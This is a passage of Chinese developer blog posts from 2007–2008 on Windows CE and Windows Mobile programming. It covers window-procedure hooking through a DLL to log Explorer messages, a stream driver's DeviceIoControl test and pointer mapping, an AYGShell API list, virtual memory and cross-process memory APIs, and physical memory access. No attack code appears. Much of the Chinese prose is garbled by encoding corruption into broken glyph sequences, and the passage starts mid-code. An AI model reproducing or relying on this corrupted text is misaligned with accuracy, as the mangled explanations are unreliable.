　tuntApiRet = clsCECoreAPI.PerformCallBack4(ref tudtCALLBACKINFO,IntPtr.Zero,IntPtr.Zero,IntPtr.Zero );
　//clsCECoreAPI.Sleep(5000);
}

[DllImport("HookWindowsProcMFCDLL.dll")]
public static extern int fnAttachWinProc(IntPtr ni_hAttatchWin);

[DllImport("HookWindowsProcMFCDLL.dll")]
public static extern int fnDetachWinMsgProc(IntPtr ni_hDetachWin);

取消挂接的代码根据上�q�C��码很�Ҏ��可以徏立，不再�l�叙�?/p>
注：clsCECoreAPI的函数全是封装的标准CE API�Q�由于这些API在msdn 中都有详�l�的文��注释�Q�因��幅所限，不再��代码一一列�D.

在执行这个程序时�Q�将模拟器的�׃�n路径设�ؓPC机的桌面�Q�这��h��拟器的storage card目录��q��同桌面了�Q�点模拟器的开始菜单，选程序，你就可以看到explore�H�体的消息都输出到桌面的WinProcInfo.txt文�g中了�Q�运行结果如下：

　　

　目前本程序只在PPC2003/wm5 for PPC��试通过,�׃��smartphone�pȝ��在编译时使用了和ppc�pȝ��不同的机�Ӟ��内存�q�作不明�Q�本�E�序在smartphone上无法正��运行，有好的徏议的话请指教一�?谢谢.

井泉 2008-08-14 09:29 发表评论

井泉 — Thu, 14 Aug 2008 01:28:00 GMT

可以使用下面的应用程序代码测试这�?/span>driver�Q��?/span>evc�~�译�?/span>

#include

#include

#include

#include "objbase.h"

#include "initguid.h"

#include "foo.h"

//char data1[10];

int WinMain(void)

{

    HANDLE hnd;

    COPY_STRUCT cs[1];

    int i;

    //static char data1[10];

auto char data1[10];

    auto char data2[10];

    static char* p1,*p2;

    //cs.pBuffer1 = (char *)malloc(10);

    //cs.pBuffer2 = (char*)malloc(10);

    //cs.nLen = 10;

    p1 = (char *)LocalAlloc(LPTR,10);

    p2 = (char *)malloc(10);

    //cs[0].pBuffer1 = (char *)malloc(10);

    //cs[0].pBuffer2 = (char*)malloc(10);

    cs[0].pBuffer1 = &data1[0];

    cs[0].pBuffer2 = &data2[0];

    cs[0].nLen = 10;

    memset(cs[0].pBuffer1,'a',10);

    hnd = CreateFile(FOO_DEV_NAME,GENERIC_READ|GENERIC_WRITE,0,NULL,0,0,NULL);

    if(hnd==NULL)

    {

           printf("Open device falied!\n");

           return;

    }

    DeviceIoControl(hnd,IOCTL_FOO_XER,&cs[0],sizeof(COPY_STRUCT),NULL,0,NULL,NULL);

    //for(i=0;i<9;i++)

    //{

           //printf(" %c",*(cs.pBuffer2++));

    //}

    printf("\n");

    CloseHandle(hnd);

// free(cs[0].pBuffer1);

// free(cs[0].pBuffer2);

}

可以通过evc的单步调试看�l�果。好了一切都完成了，我们来看看系�l�是怎么工作的吧�Q�从应用�E�序开始，

CreateFile(FOO_DEV_NAME,GENERIC_READ|GENERIC_WRITE,0,NULL,0,0,NULL);

会调用到

FOO_Open(DWORD dwContext, DWORD AccessCode, DWORD ShareMode)

�?/span>FOO_DEV_NAME名字定义�?/span>foo.h里面�?/span>

#define       FOO_DEV_NAME L"Foo1:"

注意后面�?/span> 1 ,�q�个是和注册表的�q�一��匹配的

"Index"=dword:1

当调�?/span>CreateFile发生了什么，slot之间的�{换，一�p�d��pȝ��操作后，调用到我们自��q��driver函数FOO_Open�Q�在�q�个函数里我们返回了一个句柄，它可以用来存储我们的自己driver的信息。在其它I/O操作中可以��用�?/span>

Driver什么时候加载的�Q�在注册表里�Q?/span>device manager会一个个的加载，会调用到FOO_Init函数。这个函数返回一个指针，在调�?/span>FOO_Open又传回来了，�q�样我们��可以实现初始化一些自�?/span>driver的东�ѝ�?/span>

接着一个重要的函数�Q?/font>

DeviceIoControl(hnd,IOCTL_FOO_XER,&cs[0],sizeof(COPY_STRUCT),NULL,0,NULL,NULL);

调用�?/font>

FOO_IOControl

走到�q�里

case IOCTL_FOO_XER:

           if((pInBuf==NULL))

                  {

                         SetLastError(ERROR_INVALID_PARAMETER);

                         break;

                  }

                  pcs = (COPY_STRUCT*)pInBuf;



                  __try{

                         pMap1 = MapPtrToProcess(pcs->pBuffer1,GetCallerProcess());

                         pMap2 = MapPtrToProcess(pcs->pBuffer2,GetCallerProcess());

                         DEBUG_OUT(1, (TEXT("+FOO_IOControl(0x%x,0x%x)\r\n"),pcs->pBuffer1,pcs->pBuffer2));

                         memcpy(pcs->pBuffer2,pcs->pBuffer1,pcs->nLen);

                         bResult = TRUE;

                         }

                  __except(EXCEPTION_EXECUTE_HANDLER){

                         DEBUG_OUT(1,(TEXT("Exception:FOO_IOCTL\r\n")));

                         break;

                  }



                  break;

           default:

                  break;

�q�里又很多东西要研究�Q?/font>

从应用程序传来的参数有， control code�Q?/span>IOCTL_FOO_XER和一个重要的输入参数&cs[0],它是一个指针�?/span>cs 是一个结构体�Q�定义在FOO.H

typedef struct {

    char* pBuffer1;

    char* pBuffer2;

    int nLen;

}COPY_STRUCT;

而且�q�个�l�构体里有两个指针�?/font>

DeviceIoControl 传过来的指针可以用吗�Q�它包含的两个指针可以直接用吗？

按照PB�q�接帮助文��看，

The operating system (OS ) manages pointers passed directly as parameters. Drivers must map all pointers contained in structures. DeviceIoControl buffers are often structures that contain data, some of which might be pointers.

You can map a pointer contained in a structure by calling MapPtrToProcess, setting the first parameter to the pointer, and then setting the second parameter to GetCallerProcess.

cs指针已经映射好了�Q�但是它指向的结构里的指针我们需要自�׃��?/span>MapPtrToProcess函数映射�?span lang="EN-US">

�q�也��是�Q?span lang="EN-US">

                         pMap1 = MapPtrToProcess(pcs->pBuffer1,GetCallerProcess());

                         pMap2 = MapPtrToProcess(pcs->pBuffer2,GetCallerProcess());

的由来，可是后面的代码没有��?span lang="EN-US">pMap1�Q?span lang="EN-US">pMap2。而是直接使用�Q?span lang="EN-US">

memcpy(pcs->pBuffer2,pcs->pBuffer1,pcs->nLen);

而且它还工作了，没有出现exception。很奇怪。我�W�一�ơ在一个家伙的代码里看见这�U�情况，很吃惊，但是它工作的很好�Q�是文��出错了？

我们来分析一下，看看应用�E�序的代码：

    COPY_STRUCT cs[1];

auto char data1[10];

    auto char data2[10];

cs�l�构�?span lang="EN-US">data1�Q?span lang="EN-US">data2数组都是自动变量�Q�存攑֜�堆栈里。假设这个应用程序被加蝲�?span lang="EN-US">0x18000000位置�?span lang="EN-US">slot里，那么他们的地址都是0x18XXXXXX。不熟悉wince memory architecture的可以看看资料，了解一�?span lang="EN-US">slot。当调用�?span lang="EN-US">

DeviceIoControl�Q�按照文档的说法�Q?/span>cs指针得到了�{换，因�ؓ从应用程序的�q�程转到�?/span>device.exe�q�程�Q��?/span>device�q�程又是当前的运行的�q�程�Q�被映射��C��slot0�Q�系�l�负责�{�?/span>cs指针。�?/span>cs包含�?/span>pBuffer1�?/span>pBuffer2是没有映��不能直接用的�?/span>

事实上，我们传过来的指针�Ҏ��是不需要映��，因�ؓ他们都是0x18xxxxxx,在应用程序的slot里，所以只�?span lang="EN-US">device.exe有访问应用程序的权限�Q�就可以了。而这个权限，�pȝ��已经帮我们设�|�好了�?span lang="EN-US">

那什么情况下要自己映��呢�Q?span lang="EN-US">

如果应用�E�序在定�?span lang="EN-US"> data1�?span lang="EN-US">data2使用static关键字，或者��?span lang="EN-US">LocalAlloc�Q?span lang="EN-US">HeapAlloc的时候，一定要自己映射cs里的指针�?span lang="EN-US">

在应用程序里�q�样写：

    cs.pBuffer1 = (char *)malloc(10);

    cs.pBuffer2 = (char*)malloc(10);

    cs.nLen = 10;

如果不��?/span>MapPtrToProcess完成映射�Q�那��出�?span lang="EN-US">data abort exception.

��Z��么呢�Q?span lang="EN-US">

因�ؓ�q�些变量都是在堆里分配的�Q�而当应用�E�序�q�行�Ӟ��被映��到slot0�Q�堆的地址也就是处�?span lang="EN-US">slot的范围内�Q�传递到device.exe后，device.exe被映��到�?span lang="EN-US">slot0�Q�这个时候必��要��应用程序的指针映射回应用程序所在的slot。否则访问的�?span lang="EN-US">device.exe的空��_��会发生不可知道的�l�果�?span lang="EN-US">

验证一下上面说的地址分配问题�?span lang="EN-US">

我们�q�样定义

COPY_STRUCT cs[1];

static char data1[10]; 堆里

auto char data2[10];   栈里

�q�样赋��|��

cs[0].pBuffer1 = &data1[0];

cs[0].pBuffer2 = &data2[0];

cs[0].nLen = 10;

调试信息�Q?span lang="EN-US">

cs[0].pBuffer1 = &data1[0];

180112D0   ldr       r2, [pc, #0xD0]

180112D4   str       r2, [sp, #0x10]

��d��&data1[0]使用的是PC作�ؓ基址�Q�而此时的应用�E�序处于�q�行阶段映射�?span lang="EN-US">slot0�Q�那�?span lang="EN-US">pc也就�?span lang="EN-US">0~01ffffff范围�Q�我的调试结果是�?span lang="EN-US">0x000112D0+8,使用的是arm�Q�流水线机制�Q�当前指令地址�Q?span lang="EN-US">8才是pc倹{�?span lang="EN-US">

143:      cs[0].pBuffer2 = &data2[0];

180112D8   add      r0, sp, #0x20

180112DC   str       r0, [sp, #0x14]

��d��&data2[0]采用的是sp作�ؓ基址�Q?span lang="EN-US">sp在应用程序加载到slot的时候就��定了的。所以保持了在应用程�?span lang="EN-US">slot的��|��处于0x18xxxxxx范围�?span lang="EN-US">

我们看到因�ؓwince�?span lang="EN-US">slot机制�Q�我们有时候需要映��，有时候不需要。所�?span lang="EN-US">wince文档说结构里的指针要映射。毕竟你不知道应用程序怎么写�?span lang="EN-US">

当然�Q�你可以�Ҏ��不映��，只要把那个结构屏蔽调�Q�写一�?span lang="EN-US">STATIC LIBRARY�l�用户��用，自己保证使用正确的地址分配��可以了。上面我说的那个家伙��是�q�么�q�的�?span lang="EN-US">

好了�Q�接着

调用�Q?span lang="EN-US">

CloseHandle(hnd);

�E�序�l�束了，完成了一�ơ简单的拯��?span lang="EN-US">

�q�个框架完成了，driver的基本接口设计，��了内存指针的使用问题。但是相对于一个真正的driver�Q�还�~�少点东西，��是讉K��g的方法。下面��l�讨论如何访问硬件�?/span>

井泉 2008-08-14 09:28 发表评论

windows mobile 函数

井泉 — Tue, 25 Dec 2007 02:00:00 GMT
Windows Mobile 6为开发�h员带来的新特�?本次评��ؓ您介�l�Windows Mobile 6提供的最新API�Q�其中包括声韻I��WISP(Windows Ink Services for Pen (WISP))�Q�DLOCK�Q�Home Screen和其它可供开发�h员在Windows Mobile中��用的API�?
Outlook DLock allows you to unlock locked attached files in Outlook XP.
NETCFv2.wm.armv4i.cab     ,System_SR_CHS_wm.cab

以下 API 通过 AYGShell 公开�?br>
�~�程元素说明
SHChangeNotifyDeregister
该函数禁用窗口接收文件更攚w��知的功能�?br>
SHChangeNotifyFree
该函数清除文件更攚w��知�?br>
SHChangeNotifyRegister
该函数登记用于接收更攚w��知的应用程序�?br>
SHCloseApps
该函数尝试�ؓ应用�E�序释放内存�?br>
SHCreateMenuBar
该函数在屏幕底部创徏菜单栏�?br>
SHCreateNewItem
该函��C��~�程方式创徏新的��，好像该项是从全局 NEW 下拉菜单中选择的�?br>
SHDoneButton
该函数允许应用程序基于应用程序的状态动态显�C�或隐藏 OK 按钮�?br>
SHEnumPropSheetHandlers
该函数通过枚�D�c�项 hkey 下面的子��Ҏ��支持属性表扩展�?br>
SHFindMenuBar
该函数用来获得菜单栏�H�口的句柄�?br>
SHFreeContextMenuExtensions
该函数释放�ؓ处理上下文菜单而分配的内存�?br>
SHFullScreen
该函数用来接��某些屏�q�区域�?br>
SHGetAppKeyAssoc
该函数用于确定导航控件是否被映射到应用程序�?br>
SHGetAutoRunPath
该函数搜索第一个存储卡�Q��ƈ构造用来查找自动运行文件的路径�?br>
SHHandleWMActivate
该函数用来帮助管理输入面板和您的应用�E�序�?br>
SHHandleWMSettingChange
该函数用来帮助管理输入面板和您的应用�E�序�?br>
SHInitDialog
该函数调整对话框的大��，使其适合软�g输入面板�?br>
SHInitExtraControls
该函数调整对话框的大��，使其适合软�g输入面板�?br>
SHInputDialog
该函数用于处理输入对话框�?br>
SHInvokeContextMenuCommand
该函数调用上下文菜单中的命��o�?br>
SHLoadContextMenuExtensions
该函��C��指定的上下文和类的配�Ҏ��对应的注册表中列出的处理�E�序加蝲上下文菜单扩展�?br>
SHNotificationAdd
该函数将通知异步地添加到通知栏�?br>
SHNotificationGetData
该函数获得通知的数据�?br>
SHNotificationRemove
该函数删除通知�?br>
SHNotificationUpdate
该函数更新挂起通知的某些方面的内容�?br>
SHRecognizeGesture
该函数被自定义控件用来识别某些笔针的�W�势�?br>
SHSetAppKeyWndAssoc
该函数指�z�某个窗口负责接收特定硬件按键的按键消息�?br>
SHSetNavBarText
该函数设�|��Q务栏中的标题文本�?br>
SHSipInfo
该函数向外壳查询与输入面板和输入�Ҏ��有关的信息�?br>
SHSipPreference
该函��Cؓ输入面板��h��位置�?br>

通过provxml文�g配置的，

�q�个文�g必须要编到BIN��里�Q�如果修�Ҏ��件名�Q�bib也要相应修改�?br>
platform.bib

井泉 2007-12-25 10:00 发表评论

判断是否有非英文字符

井泉 — Mon, 19 Nov 2007 08:07:00 GMT
bool HaveNOASCII(LPWSTR str)
{
char nstring[100]={0};
wcstombs( nstring,str,100);
return (strlen(nstring)==wcslen(str));

}

井泉 2007-11-19 16:07 发表评论

�Q��{�Q�Windows应用�E�序捆绑核心�~�程

井泉 — Thu, 15 Nov 2007 04:40:00 GMT

1.3 虚拟内存讉K��

每个�q�程都拥有自��q��虚拟地址�I�间�Q�那么怎样才能讉K��q�个�I�间呢？�q�就需要用到Windows API函数。这些函数直接与�~�写�E�序相关�Q�因而更受��Y件工�E�师的关注。有兌��斚w��的函数较多，�q�里介绍几个重要的函数�?/p>
1.3.1 获取�pȝ��信息

在一个程序中不能直接应用某个�pȝ��的设备参敎ͼ�否则��不利于�E�序的移植。因此，如果��实需要用到这��L��讑֤�参数�Q�则需要一个系�l�信息函数来获得。VC++ �~�译器所提供�q�样的函��CؓGetSystemInfo()。该函数需要一个指向SYSTEM_INFO�l�构的指针作为参数。其原型表示为：

l

void GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);

l

其中lpSystemInfo�q�回LPSYSTEM_INFO�l�构的地址�Q�用于装载适当的系�l�信息，�q�个�l�构体定义�ؓ�Q?/p>
l

typedef struct _SYSTEM_INFO {

    union {

        DWORD dwOemId;

        struct {

            WORD wProcessorArchitecture;

            WORD wReserved;

        };

    };



    DWORD dwPageSize;

    LPVOID lpMinimumApplicationAddress;

    LPVOID lpMaximumApplicationAddress;

    DWORD_PTR dwActiveProcessorMask;

    DWORD dwNumberOfProcessors;

    DWORD dwProcessorType;

    DWORD dwAllocationGranularity;

    WORD   wProcessorLevel;

    WORD   wProcessorRevision;

} SYSTEM_INFO;

l

其中参数含义如下所�q��?/p>
dwOemId�Q�是一个过旉��项�Q�用于与Windows NT 3.5以及以前的版本兼宏V�?/p>
wProcessorArchitecture�Q�指明处理的�l�构�Q�如Intel、Alpha、Intel 64位或Alpha       64位�?/p>
dwPageSize�Q�用于显�C�CPU的页面大��。在x86 CPU上，�q�个值是4096字节。在Alpha CPU上，�q�个值是8192字节。在IA-64上，�q�个值是8192字节�?/p>
lpMinimumApplicationAddress�Q�用于给出每个进�E�可用地址�I�间的最��内存地址。在Windows 98上，�q�个值是0x400000�Q�因为每个进�E�的地址�I�间中下面的4MB是不能��用的。在Windows 2K/XP上，�q�个值是0x10000�Q�因为每个进�E�的地址�I�间中开头的64KB��L��I�闲的�?/p>
lpMaximumApplicationAddress�Q�用于给出每个进�E�可用地址�I�间的最大内存地址。在Windows 98上，�q�个地址�?x7FFFFFFF�Q�因为共享内存映��文件区域和�׃�n操作�pȝ��代码包含在上面的2GB分区中。在Windows XP上，�q�个地址�?x7FFEFFFF�?/p>
dwActiveProcessorMask�Q�位屏蔽�Q�指明哪个CPU是活动的�?/p>
dwNumberOfProcessors�Q�计��机中CPU的数目�?/p>
dwProcessorType�Q�处理器�c�d��?/p>
dwAllocationGranularity�Q�保留的地址�I�间区域的分配粒度�?/p>
wProcessorLevel�Q�进一步细分处理器的结构�?/p>
wProcessorRevision�Q�用于进一步细分处理器的��别�?/p>
wReserved�Q�保留供��来使用�?/p>
在以上参��C��只有lpMinimumApplicationAddress、lpMaximumApplicationAddress、dwPageSize和dwAllocationGranularity与内存有兟�?/p>
1.3.2 在应用程序中使用虚拟内存

对内存分配可以采用不同的�Ҏ��Q�常用的�Ҏ��有：用C/C++语言的内存分配函敎ͼ�例如�Q�用malloc() �?free()、new �?delete 函数分配和释攑֠�内存�Q�用Windows传统的全局或者局部内存分配函敎ͼ�如GlobalAlloc()和GlobalFree()�Q�用Win32的堆分配函数�Q�如HeapAlloc()和HeapFree()�Q�用Win32的虚拟内存分配函敎ͼ�如VirtualAlloc()和VirtualFree()。注意，用不同的�Ҏ��分配内存后，要用相对应的函数来释放所占用的内存。这里只介绍Win32的虚拟内存分配函数�?/p>
在进�E�创��Z��初�ƈ被赋予地址�I�间�Ӟ��其虚拟地址�I�间��未分配�Q�处于空闲状态。这时地址�I�间内的内存是不能��用的�Q�必��通过VirtualAlloc()函数来分配其中的各个区域�Q�对其进行保留。VirtualAlloc()函数原型为：

l

LPVOID VirtualAlloc(

    LPVOID lpAddress,

    DWORD dwSize,

    DWORD flAllocationType,

    DWORD flProtect

    );

l

该函数用来分配一定范围的虚拟��c��参�?指定起始地址�Q�参�?指定分配内存的长度；参数3指定分配方式�Q�取值MEM_COMMINT或者MEM_RESERVE�Q�参�?指定控制讉K��本次分配的内存的标识�Q�取��gؓPAGE_READONLY、PAGE_READWRITE或者PAGE_NOACCESS�?/p>
分配完成后，卛_��q�程的虚拟地址�I�间中保留了一个区域，可以�Ҏ��区域中的内存�q�行保护权限许可范围内的讉K��。当不再需要访问此地址�I�间区域�Ӟ��应释放此区域�Q�由VirtualFree()负责完成。其函数原型为：

l

BOOL VirtualFree(

    LPVOID lpAddress,

    DWORD dwSize,

    DWORD dwFreeType

    );

l

其中参数含义如下所�q��?/p>
lpAddress�Q�指向待释放��面区域的指针。如果参数dwFreeType指定了MEM_RELEASE�Q�则lpAddress必须为页面区域保留由VirtualAlloc()所�q�回的基地址�?/p>
dwSize�Q�指定了要释攄��地址�I�间区域的大��，如果参数dwFreeType指定了MEM_RELEASE标志�Q�则��dwSize讄��?�Q�由�pȝ��计算在特定内存地址上的待释攑֌�域的大小�?/p>
dwFreeType�Q��ؓ所执行的释放操作的�c�d��Q�其可能的取��gؓMEM_RELEASE和MEM_DECOMMIT�Q�其中MEM_RELEASE标志指明要释放指定的保留��面区域�Q�MEM_DECOMMIT标志则对指定的占用页面区域进行占用的解除�?/p>
如果VirtualFree()执行完成�Q�将回收全部范围的已分配��面�Q�此后如再对�q�些已释 ��N��面区域内存进行访问将引发内存讉K��异常。释攑֐�的页面区域可供系�l��l�分�?nbsp; 使用�?/p>
1.3.3 获取虚存状�?/h3>
Windows API函数GlobalMemoryStatus()可用于检索关于当前内存状态的动态信息。在软�g的About对话框中�Q�通常用这个函数来获取�pȝ��内存的��用情��c��其函数原型为：

l

void GlobalMemoryStatus(LPMEMORYSTATUS lpmstMemStat);

l

其中lpmstMemStat�q�回MEMORYSTATUS�l�构的地址�Q�这个结构体的定义�ؓ�Q?/p>
l

typedef struct MEMORYSTATUS{

    DWORD dwLength;

    DWORD dwMemoryLoad;

    DWORD dwTotalPhys;

    DWORD dwAvailPhys;

    DWORD dwTotalPageFile;

    DWORD dwAvailPageFile;

    DWORD dwTotalVirtual;

    DWORD dwAvailVirtual;

} MEMORYSTATUS ,* LPMEMORYSTATUS;

l

其中参数含义如下所�q��?/p>
dwLength�Q�MEMORYSTATUS�l�构大小�?/p>
dwMemoryLoad�Q�已使用内存所占的癑ֈ�比�?/p>
dwTotalPhys�Q�物理存储器的��d��节数�?/p>
dwAvailPhys�Q�空闲物理存储器的字节数�?/p>
dwTotalPageFile�Q�页文�g包含的最大字节数�?/p>
dwAvailPageFile�Q�用��h��式分��Z��I�闲内存大小�?/p>
dwTotalVirtual�Q�用��h��式分区大��?/p>
dwAvailVirtual�Q�表�C�当前进�E�中�q�剩下的自由区域的��d��?/p>
在调用GlobalMemoryStatus()之前�Q�必��d��dwLength成员初始化�ؓ用字节表�C�的�l�构的大��，即一个MEMORYSTATUS�l�构的大��。这个初始化操作使得Microsoft能够在新版本Windows�pȝ��中将新成员添加到�q�个�l�构中，而不会破坏现有的应用�E�序。当调用GlobalMemoryStatus()�Ӟ��它将对该�l�构的其余成员进行初始化�q�返回�?/p>
如果某个应用�E�序在内存大�?GB的计��机上运行，或者合计交换文件的大小大于4GB�Q�那么可以��用新的GlobalMemoryStatusEx()函数。其函数的原型�ؓ�Q?/p>
l

BOOL GlobalMemoryStatusEx(MEMORYSTATUSEX &mst);

l

其中mst�q�回MEMORYSTATUSEX�l�构的填充信息，该结构体与原先的MEMORYSTATUS�l�构基本相同�Q�差别在于新�l�构的所有成员的大小都是64位宽�Q�因此它的值可以大�? GB�?/p>
1.3.4 ��定虚拟地址�I�间的状�?/h3>
对内存的��理除了对当前内存的使用状态信息进行获取外�Q�还�l�常需要获取有兌��E�的虚拟地址�I�间的状态信息。例如，如何得到一个进�E�已提交的页面范��_��q�就要用��C��?API函数VirtualQuery()或VirtualQueryEx()来进行查询。这两个函数的功能相��|��不同��是VirtualQuery()只是查询本进�E�内存空间信息，而VirtualQueryEx()可以查询指定�q�程的内存空间信息。VirtualQuery()函数原型如下�Q?/p>
l

DWORD VirtualQuery(

    LPVOID lpAddress,

    PMEMORY_BASIC_INFORMATION lpBuffer,

    DWORD dwLength

    );

l

VirtualQueryEx()函数原型如下�Q?/p>
l

DWORD VirtualQueryEx(

    HANDLE hProcess ,

    LPCVOID lpAddress ,

    PMEMORY_BASIC_INFORMATION lpBuffer ,

    DWORD dwLength

    );

l

其中参数含义如下所�q��?/p>
hProcess�Q�进�E�的句柄�?/p>
lpAddress�Q�想要了解其信息的虚存地址�?/p>
lpBuffer�Q�返回MEMORY_ BASIC_INFORMATION�l�构的地址�?/p>
dwLength�Q�返回的字节数�?/p>
PWEMORY_BASIC_INFORMATION的定义如下：

l

typedef struct _MEMORY_BASIC_INFORMATION{

    PVOID BaseAddress;

    PVOID AllocationBase;

    DWORD AllocationProtect;

    DWORD RegionSize;

    DWORD State;

    DWORD Protect;

    DWORD Type;

} MEMORY_BASIC_INFORMATION, * PMEMORY_BASIC_INFORMATION;

l

其中参数含义如下所�q��?/p>
BaseAddress�Q�被查询内存块的基地址�?/p>
AllocationBase�Q�用VirtualAlloc()分配该内存时实际分配的基地址�?/p>
AllocationProtect�Q�分配该��面�Ӟ��面的一些属性，如PAGE_READWRITE、PAGE_EXECUTE�{�（其他属性可参�?Platform SDK�Q��?/p>
RegionSize�Q�从BaseAddress开始，��h��相同属性的��面的大��?/p>
State�Q�页面的状态，�?�U�可能��|��MEM_COMMIT、MEM_FREE和MEM_ RESERVE�Q�这个参数是最重要的，从中可知指定内存��面的状态�?/p>
Protect�Q�页面的属性，它可能的取��g�� AllocationProtect 相同�?/p>
Type�Q�指明了该内存块的类型，�?�U�可能��|��MEM_IMAGE、MEM_MAPPED和MEM_PRIVATE�?/p>
1.3.5 改变内存��面保护属�?/h3>
在进行进�E�挂钩时�Q�经常要向内存页中写入部分代码，�q�就需要改变内存页的保护属性。有�q�的是Win32提供了两个API函数VirtualProtect()和VirtualProtectEx()�Q�它们可以对改变内存��保护。例如，在��用这两个函数�Ӟ��可以先按PAGE_READWRITE属性来提交一个页的地址�Q��ƈ且立卛_��数据填写到该��中�Q�然后再把该��늚�属性改变�ؓPAGE_READONLY�Q�这样可以有效地保护数据不被该进�E�中的�Q何其他线�E�重写。在调用�q�两个函��C��前最好先了解有关��面的信息，可以通过VirtualQuery()来实现�?/p>
VirtualProtect()与VirtualProtectEx()函数的区别在于VirtualProtect()只适用于本�q�程�Q�而VirtualProtectEx()可以适用于其他进�E�。VirtualProtect()函数原型如下�Q?/p>
BOOL VirtualProtect(

    PVOID pvAddress,

    DWORD dwSize,

    DWORD flNewProtect,

    PDWORD pflOldProtect

    );

l

VirtualProtectEx()函数原型如下�Q?/p>
l

BOOL VirtualProtectEx(

    HANDLE hProcess,

    PVOID pvAddress,

    DWORD dwSize,

    DWORD flNewProtect,

    PDWORD pflOldProtect

    );

l

其中参数的含义如下所�q��?/p>
hProcess�Q�要修改内存的进�E�句柄�?/p>
pvAddress�Q�指向内存的基地址�Q�它必须位于�q�程的用��h��式分��Z��Q��?/p>
dwSize�Q�用于指明想要改变保护属性的字节数�?/p>
flNewProtect�Q�代表PAGE_*保护属性标志中的�Q何一个标志，但PAGE_ WRITECOPY和PAGE_EXECUTE_WRITECOPY�q�两个标志除外�?/p>
pflOldProtect�Q�是DWORD大小的地址�Q�VirtualProtect()和VirtualProtectEx()��用原先与pvAddress位置上的字节相关的保护属性填入该地址。尽��许多应用程序�ƈ不需要该信息�Q�但是必��Mؓ该参��C��递一个有效地址�Q�否则该函数的运行将会失败�?/p>
1.3.6 �q�行一个进�E�的内存��d��

前面已经说明了如何获得一个进�E�的内存属性、如何分配内存和如何改变内存��늚�保护属性，其最�l�的目的是要对一个进�E�中内存内容�q�行��d��。要完成此工作，需要用��C��个函敎ͼ�ReadProcessMemory() 和WriteProcessMemory()�Q�这两个函数非常有用。如果知道了一个进�E�的句柄和内存地址�Q�就可以用ReadProcessMemory()函数来得到该�q�程和该地址中的内容�Q�此函数的原型�ؓ�Q?/p>
l

BOOL ReadProcessMemory(

    HANDLE hProcess,

    LPCVOID lpBaseAddress,

    LPVOID lpBuffer,

    DWORD nSize,

    LPDWORD lpNumberOfBytesRead

    );

l

其中hProcess��d��的进�E�句柄，lpBaseAddress��内存的�v始地址�Q�lpBuffer��入数据的地址�Q�nSize��d��的字节数�Q�lpNumberOfBytesRead为实际读入的�?nbsp; 节数�?/p>
同样�Q�如果知道了一个进�E�的句柄和内存地址�Q�可以用WriteProcessMemory()函数向该�q�程和该地址中写入新的内容，�q�个函数的原型�ؓ�Q?/p>
l

BOOL WriteProcessMemory(

    HANDLE hProcess,

    LPVOID lpBaseAddress,

    LPVOID lpBuffer,

    DWORD nSize,

    LPDWORD lpNumberOfBytesWritten

    );

l

其中参数hProcess��写入的进�E�句柄，lpBaseAddress为写内存的�v始地址�Q�lpBuffer为写入数据的地址�Q�nSize��写入的字节数�Q�lpNumberOfBytesWritten为实际写入的字节数�?/p>

井泉 2007-11-15 12:40 发表评论

�Q��{�Q�Windows CE下访问物理内存的一些方法！�Q?

井泉 — Thu, 15 Nov 2007 04:28:00 GMT

嵌入式设备与桌面PC的一个显著不同是它的应用�E�序中通常需要直接访问某一�D늉�理内存，�q�在驱动�E�序中对物理内存的访问尤为重要，��其是像ARM体系�l�构下，I/O端口也被映射成某一个物理内存地址。因此，与桌面版�?/span>Windows相比�Q?/span>Windows CE提供了相对简单的物理内存讉K��方式。无论是驱动�E�序�q�是应用�E�序都可以通过API讉K��某一�D늉�理内存�?/span>

Windows CE的有些函��C��需要用到物理内存结构体PHYSICAL_ADDRESS�Q?/span> Windows CE�?/span>ceddk.h中定义了PHYSICAL_ADDRESS�Q�它其实�?/span>LARGE_INTEGER�c�d��Q�其定义如下�Q?/span>

// in ceddk.h

typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;

// in winnt.h

typedef union _LARGE_INTEGER{

struct{

    DWORD LowPart;

    LONG HighPart;

};

LONGLONG QuadPart;

} LARGE_INTEGER;

可见�Q?/span>Windows CE中用64�?/span>Bit来代表物理地址�Q�对于大多数32位的CPU而言�Q�只需要把它的HighPart讄��?/span>0��可以了�?/span>

如果要直接访问某一个地址的物理内存，Windows CE提供�?/span>VirtualAlloc()�?/span>VirtualCopy()函数�Q?/span>VirtualAlloc负责在虚拟内存空间内保留一�D�虚拟内存，�?/span>VirtualCopy负责把一�D늉�理内存和虚拟内存�l�定�Q�这��P��最�l�对物理内存的访问还是通过虚拟地址�q�行。它们的声明如下�Q?/span>

// 甌��虚拟内存

LPVOID VirtualAlloc(

LPVOID lpAddress,     // 希望的虚拟内存�v始地址

DWORD dwSize,             // 以字节�ؓ单位的大��?/span>

DWORD flAllocationType, // 甌��c�d��Q�分�?/span>Reserve�?/span>Commit

DWORD flProtect           // 讉K��权限

);

// 把物理内存绑定到虚拟地址�I�间

BOOL VirtualCopy(

LPVOID lpvDest,           // 虚拟内存的目标地址

LPVOID lpvSrc,            // 物理内存地址

DWORD cbSize,             // 要绑定的大小

DWORD fdwProtect          // 讉K��权限

);

VirtualAlloc对虚拟内存的甌��分�ؓ两步�Q�保�?/span>MEM_RESERVE和提�?/span>MEM_COMMIT。其�?/span>MEM_RESERVE只是在进�E�的虚拟地址�I�间内保留一�D�，�q�不分配实际的物理内存，因此保留的虚拟内存�ƈ不能被应用程序直接��用�?/span>MEM_COMMIT阶段才真正的��拟内存分配物理内存�?/span>

下面的代码显�C�Z��如何使用VirtualAlloc�?/span>VirtualCopy来访问物理内存。因�?/span>VirtualCopy负责把一�D늉�理内存和虚拟内存�l�定�Q�所�?/span>VirtualAlloc的时候只需要对内存保留�Q�没有必要提交�?/span>

FpDriverGlobals =

(PDRIVER_GLOBALS) VirtualAlloc(

    0,

    DRIVER_GLOBALS_PHYSICAL_MEMORY_SIZE,

    MEM_RESERVE,

    PAGE_NOACCESS);

if (FpDriverGlobals == NULL) {

    ERRORMSG(DRIVER_ERROR_MSG, (TEXT(" VirtualAlloc failed!\r\n")));

    return;

}

else {

    if (!VirtualCopy(

    (PVOID)FpDriverGlobals,

    (PVOID)(DRIVER_GLOBALS_PHYSICAL_MEMORY_START),

    DRIVER_GLOBALS_PHYSICAL_MEMORY_SIZE,

    (PAGE_READWRITE | PAGE_NOCACHE))) {

       ERRORMSG(DRIVER_ERROR_MSG, (TEXT("VirtualCopy failed!\r\n")));

       return;

    }

}

